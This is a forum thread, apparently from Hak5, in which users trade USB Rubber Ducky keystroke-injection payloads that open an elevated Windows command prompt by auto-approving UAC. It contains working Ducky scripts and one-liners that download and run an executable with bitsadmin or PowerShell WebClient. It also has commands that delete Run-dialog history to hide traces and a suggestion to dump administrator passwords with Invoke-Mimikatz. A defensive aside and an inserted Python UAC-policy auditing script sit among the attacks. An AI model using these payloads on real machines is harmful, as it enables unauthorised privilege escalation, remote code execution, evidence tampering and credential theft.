Darren Kitchen Posted August 19, 2013

The duck is pretty good at bypassing UAC. Let's make it better.

    REM *********************************
    REM Payload: Old Method to Bypass UAC
    REM Target: Window 7
    REM Author: Darren Kitchen
    REM *********************************
    GUI
    DELAY 500
    STRING cmd
    DELAY 3000
    MENU
    DELAY 2000
    STRING a
    REM *************************************************************
    REM Depending on Windows Version an ENTER could be necessary here
    REM *************************************************************
    DELAY 3000
    LEFT
    ENTER
    DELAY 500
    STRING echo Admin Prompt in 9 seconds

Not bad. Let's shave another 2 seconds off...

    REM ********************************
    REM Payload: Less Finicky UAC Bypass
    REM Target: Window 7
    REM Author: Darren Kitchen
    REM ********************************
    GUI r
    DELAY 500
    STRING cmd
    ENTER
    DELAY 500
    STRING copy con sudo.cmd
    ENTER
    STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs
    ENTER
    STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs
    ENTER
    STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs
    ENTER
    STRING @cscript %temp%\sudo.tmp.vbs
    ENTER
    CTRL z
    ENTER
    STRING sudo.cmd cmd
    ENTER
    DELAY 3000
    ALT y
    DELAY 500
    STRING echo Admin Prompt in 7 seconds

Not bad. Let's shave another 2 seconds off...

    REM ********************************************
    REM Payload: Fastest UAC Bypass using Powershell
    REM Target: Window 7
    REM Author: Darren Kitchen
    REM ********************************************
    GUI r
    DELAY 500
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 3000
    ALT y
    DELAY 500
    STRING echo Admin Prompt in 5 seconds

Not bad. Let's shave another 2 seconds off...? Thoughts?
strangelaw Posted August 19, 2013

(From Brutelogic) ->

    bitsadmin /transfer n http://domain/file c:\%homepath%\file && c:\%homepath%\file
Darren Kitchen (Author) Posted August 19, 2013

    BITSADMIN version 3.0 [ 7.5.7601 ]
    BITS administration utility.
    (C) Copyright 2000-2006 Microsoft Corp.

    BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
    Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

Which is why....

    powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%temp%\bob.exe'); Start-Process "%temp%\bob.exe"

However cool, it still doesn't open a command prompt bypassing UAC.
overwraith Posted August 19, 2013

I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn off procedure though.

http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/
nikkelitous Posted August 20, 2013

> I found a website that has a way to turn off UAC by command line. Don't know if UAC will still bug you during the turn off procedure though.
> http://www.howtogeek.com/howto/windows-vista/enable-or-disable-uac-from-the-windows-vista-command-line/

Unfortunately, this method requires a reboot. Though it does completely disable UAC rather than just a one off.
BuckoA51 Posted August 20, 2013

The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway (or with UAC off and non-admin accounts for the staff).
Darren Kitchen (Author) Posted August 20, 2013

> The countermeasure to this is, of course, don't run as admin, so that every time UAC pops up you have to put your admin password in. This is how a corporate desktop should be configured anyway, (or with UAC off and non-admin accounts for the staff).

Emphasis mine.
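The difference BuckoA51 and Darren are pointing at is a registry policy, not a setting on the duck. The following is an added example (not from the thread or from Hak5) that classifies a host's UAC policy the way an auditor would: it reads the documented DWORDs EnableLUA, ConsentPromptBehaviorAdmin and ConsentPromptBehaviorUser from a dict and reports whether an interactive session can reach an elevated prompt with a single keystroke or needs a password. The snapshots are constructed to match the configurations discussed above.

```python
# Added example: classify a host's UAC policy. The DWORDs live under
# HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System.
ADMIN_SILENT = {0}              # ConsentPromptBehaviorAdmin: elevate without prompting
ADMIN_CONSENT_ONLY = {2, 4, 5}  # prompt for consent only: a click or ALT+Y approves (5 = default)
# Remaining values 1 and 3 prompt the admin for a password.


def assess_uac(policy, user_is_admin):
    """Return (risk, reason) for an interactive session under this policy.

    policy holds the registry DWORDs; missing values take the Windows defaults.
    """
    enable_lua = policy.get("EnableLUA", 1)
    admin_mode = policy.get("ConsentPromptBehaviorAdmin", 5)
    user_mode = policy.get("ConsentPromptBehaviorUser", 3)
    if user_is_admin:
        if not enable_lua:
            return "high", "EnableLUA=0 with an admin user: everything already runs elevated"
        if admin_mode in ADMIN_SILENT:
            return "high", "ConsentPromptBehaviorAdmin=0: elevation without any prompt"
        if admin_mode in ADMIN_CONSENT_ONLY:
            return "medium", "consent-only prompt: one keystroke approves elevation"
        return "low", "admin must retype a password to elevate"
    if not enable_lua:
        return "low", "standard user with UAC off: no in-session elevation path"
    if user_mode == 0:
        return "low", "standard user: elevation requests are denied outright"
    return "low", "standard user: elevation needs an administrator's credentials"


# Constructed snapshots matching the configurations discussed in the thread.
SNAPSHOTS = {
    "admin, UAC on (default)": ({"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5}, True),
    "admin, UAC off": ({"EnableLUA": 0}, True),
    "admin, credential prompt": ({"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 1}, True),
    "standard user, UAC on": ({"EnableLUA": 1}, False),
    "standard user, UAC off": ({"EnableLUA": 0}, False),
}


def audit(snapshots=SNAPSHOTS):
    """Evaluate every snapshot; returns {name: (risk, reason)}."""
    return {name: assess_uac(p, admin) for name, (p, admin) in snapshots.items()}


if __name__ == "__main__":
    for name, (risk, reason) in audit().items():
        print(f"{name:26s} {risk:6s} {reason}")
```

On a live Windows host the same dict can be filled from that key with winreg; the classification logic does not change.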
411Hall Posted August 26, 2013

Good stuff! I have replaced the Toolkit's method with this one.
BuckoA51 Posted August 30, 2013

> Emphasis mine.

Too true Darren. I know, the last company I was at doing a quick audit, they had Windows 7 and half the staff were running as admin with UAC on, the other half as admin with UAC disabled, because, you know, it's such a bind to click "Yes" every now and again.
tom564 Posted September 5, 2013

>     REM ********************************
>     REM Payload: Less Finicky UAC Bypass
>     REM Target: Window 7
>     REM Author: Darren Kitchen
>     REM ********************************
>     GUI r
>     DELAY 500
>     STRING cmd
>     ENTER
>     DELAY 500
>     STRING copy con sudo.cmd
>     ENTER
>     STRING @echo Set objShell = CreateObject("Shell.Application") > %temp%\sudo.tmp.vbs
>     ENTER
>     STRING @echo args = Right("%*", (Len("%*") - Len("%1"))) >> %temp%\sudo.tmp.vbs
>     ENTER
>     STRING @echo objShell.ShellExecute "%1", args, "", "runas" >> %temp%\sudo.tmp.vbs
>     ENTER
>     STRING @cscript %temp%\sudo.tmp.vbs
>     ENTER
>     CTRL z
>     ENTER
>     STRING sudo.cmd cmd
>     ENTER
>     DELAY 3000
>     ALT y
>     DELAY 500
>     STRING echo Admin Prompt in 7 seconds
>
> Not bad. Let's shave another 2 seconds off...
>
>     REM ********************************************
>     REM Payload: Fastest UAC Bypass using Powershell
>     REM Target: Window 7
>     REM Author: Darren Kitchen
>     REM ********************************************
>     GUI r
>     DELAY 500
>     STRING powershell Start-Process cmd -Verb runAs
>     ENTER
>     DELAY 3000
>     ALT y
>     DELAY 500
>     STRING echo Admin Prompt in 5 seconds
>
> Not bad. Let's shave another 2 seconds off...? Thoughts?

Having powershell Start-Process cmd.exe -Verb runAs as the last run command in the run prompt would make me suspicious if I saw it. Is there any way you can clean up after to remove the obvious trace?
Xcellerator Posted September 6, 2013

You can delete the entire history from the Run dialog using

    reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

or, you can specify what exact command you want removed with this:

    for /f "tokens=1 delims= " %%A in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ^| findstr "powershell Start-Process cmd.exe -Verb RunAs"') do (reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /v %%A /f)

or change "powershell Start-Process cmd.exe -Verb RunAs" to anything you like.
SN4T14 Posted September 11, 2013 (edited)

    CONTROL ESCAPE
    DELAY 200
    STRING cmd
    CTRL-SHIFT ENTER
    DELAY 2800
    ALT y

Another 2 seconds shaved off. ;)

Edit: Better version using run menu, should work when there's a lot of entries in the start menu, and doesn't put an unnecessary "y" in the CMD window if UAC is off.

    GUI R
    DELAY 200
    STRING runas /profile /user:%COMPUTERNAME%\Administrator "cmd"
    ENTER
    DELAY 2700
    ALT y
    DELAY 100
    BACKSPACE

Edited September 12, 2013 by SN4T14
crackruckles Posted September 16, 2013

1. Press the Win keyboard key or click on Vista Start button.
2. Type cmd into the Start Search textbox.
3. Press Ctrl+Shift+Enter keyboard shortcut. Ctrl-Shift-Enter is the general keyboard shortcut that triggers elevation to "Run as Administrator".
4. Press Alt+C or press Continue to confirm the UAC elevation warning prompt.

http://www.mydigitallife.info/how-to-open-elevated-command-prompt-with-administrator-privileges-in-windows-vista/
factgasm Posted December 3, 2013

The CTRL+SHIFT+ENTER combo works on the keyboard but how do you code that in Ducky Script? Can Ducky Script handle three keys being pressed simultaneously? I tried this script earlier and it didn't work:

    DEFAULTDELAY 50
    DELAY 3000
    CONTROL ESCAPE
    STRING cmd
    CONTROL SHIFT ENTER
    ALT Y
    EXIT
googleknowsbest Posted December 19, 2013

Dialogue box is not highlighted before the ALT y (Win 8).
Plazmaz Posted August 19, 2014 (edited)

You should be able to use this on windows 8.1:

    GUI X
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    DOWN
    ENTER
    ALT y

Edited August 22, 2014 by Plazmaz
MB60893 Posted September 6, 2014

Firstly, when you refer to "Bypass" UAC, what you are really saying is don't bring up the dialog box saying "Do you want to run xyz program as Administrator?". What I think would be better is to get administrator rights from a guest user's perspective, just about guaranteeing that any program would work if you needed to execute it. If I knew someone who was an administrator, I would simply write a ducky script using the CTRL-SHIFT-ENTER command to elevate Powershell, then use the "Invoke-Mimikatz" command with "-DumpCreds". This would output the administrator password for the computer (providing it is not a Windows 8/8.1 machine). I know there is a way you can execute a task as another user... so if you knew the administrator password for a computer, you could simply rock up as a guest, and run the task as an admin user. Thoughts?